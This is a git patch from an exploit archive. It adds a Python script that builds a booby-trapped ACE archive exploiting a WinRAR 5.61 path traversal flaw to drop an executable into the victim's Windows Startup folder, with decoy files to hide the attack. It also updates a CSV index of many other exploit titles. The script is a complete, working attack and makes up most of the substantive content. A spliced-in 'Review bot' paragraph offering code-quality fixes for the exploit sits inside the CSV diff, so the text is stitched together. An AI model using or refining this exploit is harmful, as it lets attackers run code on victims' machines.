From ab4683fee8c7f710156238e59a465b080a248ab1 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sun, 17 Mar 2019 05:01:51 +0000
Subject: [PATCH] DB: 2019-03-17
1 changes to exploits/shellcodes
WinRAR 5.61 - Path Traversal
Nuuo Central Management - Authenticated SQL Server SQL Injection (Metasploit)
Nuuo Central Management - (Authenticated) SQL Server SQL Injection (Metasploit)
Splunk Enterprise 7.2.3 - Authenticated Custom App RCE
Splunk Enterprise 7.2.3 - (Authenticated) Custom App Remote Code Execution
LogonBox Limited / Hypersocket Nervepoint Access Manager - Unauthenticated Insecure Direct Object Reference
LogonBox Limited / Hypersocket Nervepoint Access Manager - (Unauthenticated) Insecure Direct Object Reference
VA MAX 8.3.4 - Authenticated Remote Code Execution
VA MAX 8.3.4 - (Authenticated) Remote Code Execution
WordPress Plugin Booking Calendar 8.4.3 - Authenticated SQL Injection
WordPress Plugin Booking Calendar 8.4.3 - (Authenticated) SQL Injection
PRTG Network Monitor 18.2.38 - Authenticated Remote Code Execution
PRTG Network Monitor 18.2.38 - (Authenticated) Remote Code Execution
CMS Made Simple Showtime2 Module 3.6.2 - Authenticated Arbitrary File Upload
CMS Made Simple Showtime2 Module 3.6.2 - (Authenticated) Arbitrary File Upload
---
 exploits/windows/local/46552.py | 118 ++++++++++++++++++++++++++++++++
 files_exploits.csv | 15 ++--
 2 files changed, 126 insertions(+), 7 deletions(-)
 create mode 100755 exploits/windows/local/46552.py
diff --git a/exploits/windows/local/46552.py b/exploits/windows/local/46552.py
new file mode 100755
index 000000000..9db767f0b
--- /dev/null
+++ b/exploits/windows/local/46552.py
@@ -0,0 +1,118 @@ +#!/usr/bin/env python3 + +import os +import re +import zlib +import binascii + +# The archive filename you want +rar_filename = "test.rar" +# The evil file you want to run +evil_filename = "calc.exe" +# The decompression path you want, such shown below +target_filename = r"C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hi.exe" +# Other files to be displayed when the victim opens the winrar +# filename_list=[] +filename_list = ["hello.txt", "world.txt"] + +class AceCRC32: + def __init__(self, buf=b''): + self.__state = 0 + if len(buf) > 0: + self += buf + + def __iadd__(self, buf): + self.__state = zlib.crc32(buf, self.__state) + return self + + def __eq__(self, other): + return self.sum == other + + def __format__(self, format_spec): + return self.sum.__format__(format_spec) + + def __str__(self): + return "0x%08x" % self.sum + + @property + def sum(self): + return self.__state ^ 0xFFFFFFFF + +def ace_crc32(buf): + return AceCRC32(buf).sum + +def get_ace_crc32(filename): + with open(filename, 'rb') as f: + return ace_crc32(f.read()) + +def get_right_hdr_crc(filename): + # This command may be different, it depends on the your Python3 environment. + p = os.popen('py -3 acefile.py --headers %s'%(filename)) + res = p.read() + pattern = re.compile('right_hdr_crc : 0x(.*?) 
| struct') + result = pattern.findall(res) + right_hdr_crc = result[0].upper() + return hex2raw4(right_hdr_crc) + +def modify_hdr_crc(shellcode, filename): + hdr_crc_raw = get_right_hdr_crc(filename) + shellcode_new = shellcode.replace("6789", hdr_crc_raw) + return shellcode_new + +def hex2raw4(hex_value): + while len(hex_value) < 4: + hex_value = '0' + hex_value + return hex_value[2:] + hex_value[:2] + +def hex2raw8(hex_value): + while len(hex_value) < 8: + hex_value = '0' + hex_value + return hex_value[6:] + hex_value[4:6] + hex_value[2:4] + hex_value[:2] + +def get_file_content(filename): + with open(filename, 'rb') as f: + return str(binascii.hexlify(f.read()))[2:-1] # [2:-1] to remote b'...' + +def make_shellcode(filename, target_filename): + if target_filename == "": + target_filename = filename + hdr_crc_raw = "6789" + hdr_size_raw = hex2raw4(str(hex(len(target_filename)+31))[2:]) + packsize_raw = hex2raw8(str(hex(os.path.getsize(filename)))[2:]) + origsize_raw = packsize_raw + crc32_raw = hex2raw8(str(hex(get_ace_crc32(filename)))[2:]) + filename_len_raw = hex2raw4(str(hex(len(target_filename)))[2:]) + filename_raw = "".join("{:x}".format(ord(c)) for c in target_filename) + content_raw = get_file_content(filename) + shellcode = hdr_crc_raw + hdr_size_raw + "010180" + packsize_raw \ + + origsize_raw + "63B0554E20000000" + crc32_raw + "00030A005445"\ + + filename_len_raw + filename_raw + "01020304050607080910A1A2A3A4A5A6A7A8A9" + return shellcode + +def build_file(shellcode, filename): + with open(filename, "wb") as f: + f.write(binascii.a2b_hex(shellcode.upper())) + +def build_file_add(shellcode, filename): + with open(filename, "ab+") as f: + f.write(binascii.a2b_hex(shellcode.upper())) + +def build_file_once(filename, target_filename=""): + shellcode = make_shellcode(filename, target_filename) + build_file_add(shellcode, rar_filename) + shellcode_new = modify_hdr_crc(shellcode, rar_filename) + content_raw = get_file_content(rar_filename).upper() + 
build_file(content_raw.replace(shellcode.upper(), shellcode_new.upper()).replace("01020304050607080910A1A2A3A4A5A6A7A8A9", get_file_content(filename)), rar_filename) + +if __name__ == '__main__': + print("[*] Start to generate the archive file %s..."%(rar_filename)) + + shellcode_head = "6B2831000000902A2A4143452A2A141402001018564E974FF6AA00000000162A554E524547495354455245442056455253494F4E2A" + build_file(shellcode_head, rar_filename) + + for i in range(len(filename_list)): + build_file_once(filename_list[i]) + + build_file_once(evil_filename, target_filename) + + print("[+] Evil archive file %s generated successfully !"%(rar_filename)) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 59ba5898f..ff54ce585 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10359,6 +10359,7 @@ id,file,description,date,author,type,platform,port 46522,exploits/hardware/local/46522.md,"Sony Playstation 4 (PS4) < 6.20 - WebKit Code Execution (PoC)",2019-03-08,Specter,local,hardware, 46530,exploits/windows/local/46530.py,"NetSetMan 4.7.1 - Local Buffer Overflow (SEH Unicode)",2019-03-11,"Devin Casadey",local,windows, 46536,exploits/windows/local/46536.txt,"Microsoft Windows MSHTML Engine - _Edit_ Remote Code Execution",2019-03-13,"Eduardo Braun Prado",local,windows, +46552,exploits/windows/local/46552.py,"WinRAR 5.61 - Path Traversal",2019-02-22,WyAtu,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 
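Review bot: `get_right_hdr_crc` runs `os.popen('py -3 acefile.py --headers %s'%(filename))` and then indexes `result[0]` unguarded, so when `acefile.py` is not in the working directory, the `py` launcher is absent, or the regex does not match, the failure surfaces only as an `IndexError` with no diagnostic, and the pipe from `os.popen` is never closed. Prefer the shell-free list form with an explicit check, `res = subprocess.run(['py', '-3', 'acefile.py', '--headers', filename], capture_output=True, text=True, check=True).stdout` followed by `if not result: raise RuntimeError('right_hdr_crc not found in acefile output')` (with `import subprocess` alongside the other imports), which also removes the string interpolation of `filename` into a shell command. The comment on that line should state the hidden dependency plainly, e.g. `# Requires acefile.py in the current directory; adjust the interpreter command for your environment.` As a point of style, `hex2raw4`/`hex2raw8` and the `str(binascii.hexlify(...))[2:-1]` idiom in `get_file_content` hand-roll what `struct.pack('<H', n).hex()`, `struct.pack('<I', n).hex()` and `bytes.hex()` already provide, and `for i in range(len(filename_list))` in `__main__` should iterate the list directly.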
@@ -17240,7 +17241,7 @@ id,file,description,date,author,type,platform,port
 46392,exploits/windows/remote/46392.txt,"mIRC < 7.55 - 'Custom URI Protocol Handlers' Remote Command Execution",2019-02-18,ProofOfCalc,remote,windows,
 46436,exploits/hardware/remote/46436.rb,"Belkin Wemo UPnP - Remote Code Execution (Metasploit)",2019-02-20,Metasploit,remote,hardware,
 46444,exploits/hardware/remote/46444.txt,"MikroTik RouterOS < 6.43.12 (stable) / < 6.42.12 (long-term) - Firewall and NAT Bypass",2019-02-21,"Jacob Baines",remote,hardware,
-46449,exploits/windows/remote/46449.rb,"Nuuo Central Management - Authenticated SQL Server SQL Injection (Metasploit)",2019-02-22,Metasploit,remote,windows,5180
+46449,exploits/windows/remote/46449.rb,"Nuuo Central Management - (Authenticated) SQL Server SQL Injection (Metasploit)",2019-02-22,Metasploit,remote,windows,5180
 46469,exploits/hardware/remote/46469.py,"Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow",2019-02-28,"Artem Metla",remote,hardware,
 46501,exploits/java/remote/46501.py,"Java Debug Wire Protocol (JDWP) - Remote Code Execution",2016-12-20,IOactive,remote,java,
 46506,exploits/hardware/remote/46506.rb,"QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)",2019-03-07,AkkuS,remote,hardware,
@@ -40859,7 +40860,7 @@ id,file,description,date,author,type,platform,port
 46234,exploits/php/webapps/46234.txt,"Joomla! Component JHotelReservation 6.0.7 - SQL Injection",2019-01-24,"Ihsan Sencan",webapps,php,80
 46235,exploits/php/webapps/46235.txt,"SimplePress CMS 1.0.7 - SQL Injection",2019-01-24,"Ihsan Sencan",webapps,php,80
 46237,exploits/cgi/webapps/46237.txt,"SirsiDynix e-Library 3.5.x - Cross-Site Scripting",2019-01-24,AkkuS,webapps,cgi,80
-46238,exploits/windows/webapps/46238.py,"Splunk Enterprise 7.2.3 - Authenticated Custom App RCE",2019-01-24,"Lee Mazzoleni",webapps,windows,8000
+46238,exploits/windows/webapps/46238.py,"Splunk Enterprise 7.2.3 - (Authenticated) Custom App Remote Code Execution",2019-01-24,"Lee Mazzoleni",webapps,windows,8000
 46239,exploits/php/webapps/46239.txt,"ImpressCMS 1.3.11 - 'bid' SQL Injection",2019-01-24,"Mehmet Onder",webapps,php,80
 46240,exploits/hardware/webapps/46240.html,"Zyxel NBG-418N v2 Modem 1.00(AAXM.6)C0 - Cross-Site Request Forgery",2019-01-24,"Ali Can Gönüllü",webapps,hardware,80
 46243,exploits/hardware/webapps/46243.txt,"Cisco RV320 Dual Gigabit WAN VPN Router 1.4.2.15 - Command Injection",2019-01-25,"RedTeam Pentesting",webapps,hardware,
@@ -40869,7 +40870,7 @@ id,file,description,date,author,type,platform,port
 46251,exploits/java/webapps/46251.txt,"Rundeck Community Edition < 3.0.13 - Persistent Cross-Site Scripting",2019-01-28,"Ishaq Mohammed",webapps,java,80
 46252,exploits/php/webapps/46252.txt,"WordPress Plugin Ad Manager WD 1.0.11 - Arbitrary File Download",2019-01-28,41!kh4224rDz,webapps,php,80
 46253,exploits/hardware/webapps/46253.html,"AirTies Air5341 Modem 1.0.0.12 - Cross-Site Request Forgery",2019-01-28,"Ali Can Gönüllü",webapps,hardware,80
-46254,exploits/multiple/webapps/46254.txt,"LogonBox Limited / Hypersocket Nervepoint Access Manager - Unauthenticated Insecure Direct Object Reference",2019-01-28,0v3rride,webapps,multiple,
+46254,exploits/multiple/webapps/46254.txt,"LogonBox Limited / Hypersocket Nervepoint Access Manager - (Unauthenticated) Insecure Direct Object Reference",2019-01-28,0v3rride,webapps,multiple,
 46259,exploits/php/webapps/46259.txt,"CMSsite 1.0 - 'cat_id' SQL Injection",2019-01-28,"Majid kalantari",webapps,php,80
 46260,exploits/php/webapps/46260.txt,"CMSsite 1.0 - 'search' SQL Injection",2019-01-28,"Majid kalantari",webapps,php,80
 46262,exploits/hardware/webapps/46262.py,"Cisco RV300 / RV320 - Information Disclosure",2019-01-28,"Harom Ramos",webapps,hardware,
@@ -40906,7 +40907,7 @@ id,file,description,date,author,type,platform,port
 46438,exploits/php/webapps/46438.txt,"C4G Basic Laboratory Information System (BLIS) 3.4 - SQL Injection",2019-02-21,"Carlos Avila",webapps,php,
 46344,exploits/cgi/webapps/46344.txt,"IPFire 2.21 - Cross-Site Scripting",2019-02-11,"Ozer Goker",webapps,cgi,443
 46347,exploits/php/webapps/46347.txt,"MyBB Bans List 1.0 - Cross-Site Scripting",2019-02-11,0xB9,webapps,php,80
-46348,exploits/php/webapps/46348.py,"VA MAX 8.3.4 - Authenticated Remote Code Execution",2019-02-11,"Cody Sixteen",webapps,php,
+46348,exploits/php/webapps/46348.py,"VA MAX 8.3.4 - (Authenticated) Remote Code Execution",2019-02-11,"Cody Sixteen",webapps,php,
 46349,exploits/linux/webapps/46349.txt,"CentOS Web Panel 0.9.8.763 - Persistent Cross-Site Scripting",2019-02-11,DKM,webapps,linux,
 46350,exploits/php/webapps/46350.txt,"Webiness Inventory 2.3 - 'email' SQL Injection",2019-02-11,"Mehmet EMIROGLU",webapps,php,80
 46351,exploits/php/webapps/46351.txt,"OPNsense < 19.1.1 - Cross-Site Scripting",2019-02-12,"Ozer Goker",webapps,php,80
@@ -40922,7 +40923,7 @@ id,file,description,date,author,type,platform,port
 46374,exploits/php/webapps/46374.txt,"DomainMOD 4.11.01 - 'category.php CatagoryName_ StakeHolder' Cross-Site Scripting",2019-02-14,"Mohammed Abdul Raheem",webapps,php,80
 46375,exploits/php/webapps/46375.txt,"DomainMOD 4.11.01 - 'assets/add/dns.php' Cross-Site Scripting",2019-02-14,"Mohammed Abdul Kareem",webapps,php,80
 46376,exploits/php/webapps/46376.txt,"DomainMOD 4.11.01 - 'assets/edit/host.php?whid=5' Cross-Site Scripting",2019-02-14,"Mohammed Abdul Kareem",webapps,php,80
-46377,exploits/php/webapps/46377.txt,"WordPress Plugin Booking Calendar 8.4.3 - Authenticated SQL Injection",2019-02-14,B0UG,webapps,php,80
+46377,exploits/php/webapps/46377.txt,"WordPress Plugin Booking Calendar 8.4.3 - (Authenticated) SQL Injection",2019-02-14,B0UG,webapps,php,80
 46379,exploits/php/webapps/46379.txt,"LayerBB 1.1.2 - Cross-Site Request Forgery (Add Admin)",2019-02-14,0xB9,webapps,php,80
 46384,exploits/php/webapps/46384.txt,"MyBB Trash Bin Plugin 1.1.3 - Cross-Site Scripting / Cross-Site Request Forgery",2019-02-15,0xB9,webapps,php,80
 46386,exploits/python/webapps/46386.py,"Jinja2 2.10 - 'from_string' Server Side Template Injection",2019-02-15,JameelNabbo,webapps,python,
@@ -40981,7 +40982,7 @@ id,file,description,date,author,type,platform,port
 46520,exploits/php/webapps/46520.txt,"DirectAdmin 1.55 - 'CMD_ACCOUNT_ADMIN' Cross-Site Request Forgery",2019-03-08,ManhNho,webapps,php,
 46525,exploits/multiple/webapps/46525.rb,"Liferay CE Portal < 7.1.2 ga3 - Remote Command Execution (Metasploit)",2019-03-11,AkkuS,webapps,multiple,
 46526,exploits/jsp/webapps/46526.rb,"OpenKM 6.3.2 < 6.3.7 - Remote Command Execution (Metasploit)",2019-03-11,AkkuS,webapps,jsp,
-46527,exploits/windows/webapps/46527.sh,"PRTG Network Monitor 18.2.38 - Authenticated Remote Code Execution",2019-03-11,M4LV0,webapps,windows,80
+46527,exploits/windows/webapps/46527.sh,"PRTG Network Monitor 18.2.38 - (Authenticated) Remote Code Execution",2019-03-11,M4LV0,webapps,windows,80
 46528,exploits/php/webapps/46528.py,"Flexpaper PHP Publish Service 2.3.6 - Remote Code Execution",2019-03-11,redtimmysec,webapps,php,
 46531,exploits/php/webapps/46531.html,"PilusCart 1.4.1 - Cross-Site Request Forgery (Add Admin)",2019-03-12,"Gionathan Reale",webapps,php,80
 46537,exploits/php/webapps/46537.txt,"WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion",2019-03-13,"Manuel García Cárdenas",webapps,php,80
@@ -40989,7 +40990,7 @@ id,file,description,date,author,type,platform,port
 46541,exploits/php/webapps/46541.html,"Intel Modular Server System 10.18 - Cross-Site Request Forgery (Change Admin Password)",2019-03-14,LiquidWorm,webapps,php,
 46542,exploits/php/webapps/46542.py,"Pegasus CMS 1.0 - 'extra_fields.php' Plugin Remote Code Execution",2019-03-14,R3zk0n,webapps,php,80
 46545,exploits/multiple/webapps/46545.txt,"NetData 1.13.0 - HTML Injection",2019-03-15,s4vitar,webapps,multiple,
-46546,exploits/php/webapps/46546.py,"CMS Made Simple Showtime2 Module 3.6.2 - Authenticated Arbitrary File Upload",2019-03-15,"Daniele Scanu",webapps,php,80
+46546,exploits/php/webapps/46546.py,"CMS Made Simple Showtime2 Module 3.6.2 - (Authenticated) Arbitrary File Upload",2019-03-15,"Daniele Scanu",webapps,php,80
 46548,exploits/php/webapps/46548.txt,"ICE HRM 23.0 - Multiple Vulnerabilities",2019-03-15,"Mehmet EMIROGLU",webapps,php,80
 46549,exploits/php/webapps/46549.txt,"Vembu Storegrid Web Interface 4.4.0 - Multiple Vulnerabilities",2019-03-15,"Gionathan Reale",webapps,php,80
 46550,exploits/php/webapps/46550.txt,"Laundry CMS - Multiple Vulnerabilities",2019-03-15,"Mehmet EMIROGLU",webapps,php,80